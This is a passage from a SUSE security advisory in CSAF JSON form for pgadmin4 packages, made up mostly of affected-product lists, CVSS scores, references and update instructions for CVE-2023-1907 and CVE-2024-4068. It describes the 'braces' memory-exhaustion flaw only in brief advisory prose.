"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-04-16T08:37:10Z",
"details": "important"
}
],
"title": "CVE-2023-1907"
},
{
"cve": "CVE-2024-4068",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-4068"
}
],
"notes": [
{
"category": "general",
"text": "The NPM package `braces`, versions prior to 3.0.3, fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In `lib/parse.js,` if a malicious user sends \"imbalanced braces\" as input, the parsing will enter a loop, which will cause the program to start allocating heap memory without freeing it at any moment of the loop. Eventually, the JavaScript heap limit is reached, and the program will crash.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-4068",
"url": "https://www.suse.com/security/cve/CVE-2024-4068"
},
{
"category": "external",
"summary": "SUSE Bug 1224256 for CVE-2024-4068",
"url": "https://bugzilla.suse.com/1224256"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
